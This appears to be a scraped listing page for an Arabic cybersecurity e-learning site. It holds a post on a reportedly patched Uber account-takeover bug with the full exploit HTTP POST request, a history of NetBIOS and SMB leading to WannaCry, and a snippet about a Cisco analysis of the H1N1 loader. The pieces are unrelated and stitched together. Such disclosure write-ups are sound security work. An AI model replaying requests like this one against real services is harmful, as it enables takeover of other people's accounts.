AalAb for E-Learning Solutions
Master cybersecurity, Learn, practice, and connect. Your journey to digital safety starts here.
ثغره بموقع شركه uber (للنقل و المواصلات) يسمح عن بعد و بدون اى صلاحيات على الأستيلاء على حسابات العملاء عن طريق معرفه رقم هاتفهم فقط عن طريق اعطاء البينات
على هيئه POST الى صفحه /rt/users/passwordless-signup
و الكود يكون كما يلي:
POST /rt/users/passwordless-signup HTTP/1.1
Host: cn-geo1.uber.com
User-Agent: client/iphone/2.137.1
Connection: close
Content-Type: application/json
Content-Length: 197
{"phoneNumberE164":"+ # # # # # ","userWorkflow":"PASSWORDLESS_SIGNUP","userRole":"client","mobileCountryISO2":"XX","state":"CREATE_NEW_PASSWORD","newPasswordData":{"newPassword":"12345678911a!"}
بالطبع تم عمل تحديث للموقع و تم غلق الثغره من قبل العاملين بuber
سنه 1983 جت شركه اسمها Sytek Inc اخترعت حاجه جديده فى عالم الشبكات و سمتها NetBIOS و كان الهدف منها هو ربط و اتصال البرامج على شبكه مكونه من كمبيوترات, و بما ان تكنولوجيا الشبكات ساعتها كانت على قدها, فكانت اقصى شبكه بتستخدم تقنيه اسمها baseband بتشيل حتى 80 جهاز كمبيوتر فى شبكه واحده, فبسبب ده لما جم اخترعو الNetBIOS اخترعوه محدود برضو,
جت بعدها شركه IBM (الله يمسيها بالخير) سنه 1985 و اخترعت تقنيه token ring network فالناس المطورين ياعيني اضطرو للاسف انهم يطورو الNetBIOS عشان يتماشى مع التكنولوجيا الجديده و اتسمت NetBIOS Extended User Interface (NetBEUI) عشان تقدر تتعامل مع كميه الاجهزه المتوصله فى الشبكه
فى نفس السنه جت ميكروسوفت و طبقت الNetBIOS فى تكنولوجيا شبكيه جديده اسمها MS-Net
رجوعا الى شركه IBM و احد العاملين بها و يدعى Barry Feigenbaum انشأ خدمه جديده و سماها Server Message Block (SMB) و كان الهدف منها تحويل التخزين الملفي من local access الى network access
ميكروسوفت تسكت؟؟ لا طبعا, راجت جايبه الخدمه و ضافتها على الNetBIOS و طورت فيها من سنه 1990 و بدأت تستخدمها فى انظمه windows من سنه 1992 و سمته SMB1 و بسبب كميه الtrafic الكبيره اللى كان بيولدها فى الشبكه طورته ميكروسوفت سنه 2006 و بقي SMB2 و مع صدور ويندوز 7 تم اصدار النسخه المطوره بأسم SMB2.1 و تم تطويره مره اخر الى SMB3 مع صدور ويندوز 8 و للاسف حتى مع هذا التطور لم تخلو الخدمه من العيوب الامنيه و اللى كان بسبب ثغره فيه انتشر فايروس الفديه الشهير WannaCry, و بالرغم من ان ميكروسوفت اكتشفت الثغره و نزلت تحديثات امنيه لسدها حتى قبل ما يتم تسريب ادوات وكاله الاستخبارات الامريكيه NSA الا ان عدد قليل جدا من المستخدمين هو من طبق هذه التحديثات و راح ضحيته الالاف, و بالرغم من ان ميكروسوفت اوقفت الدعم عن نسخ الونديوز القديمه مثل windows XP و windows server 2003 الا انها اصدرت التحديثات الامنيه لهم و لكن 90% من الضحايا كانو من مستخدمي ويندوز 7
09/17/2016
H1N1 - identification of the document dropping an executable, deletion of shadow copies, disabling recovery functionality, and the VBA macro obfuscation techniques
Protecting against the latest variant of H1N1 Cisco Blog > Security Security Protecting against the latest variant of H1N1 Emmett Koen - September 15, 2016 - 0 Comments This is the third and final installment in our technical analysis of the H1N1 loader. In case you missed it, my colleague Josh Reynolds peeled apart the latest variant of H1N1 a...
Click here to claim your Sponsored Listing.
Category
Website
Address
Reston, VA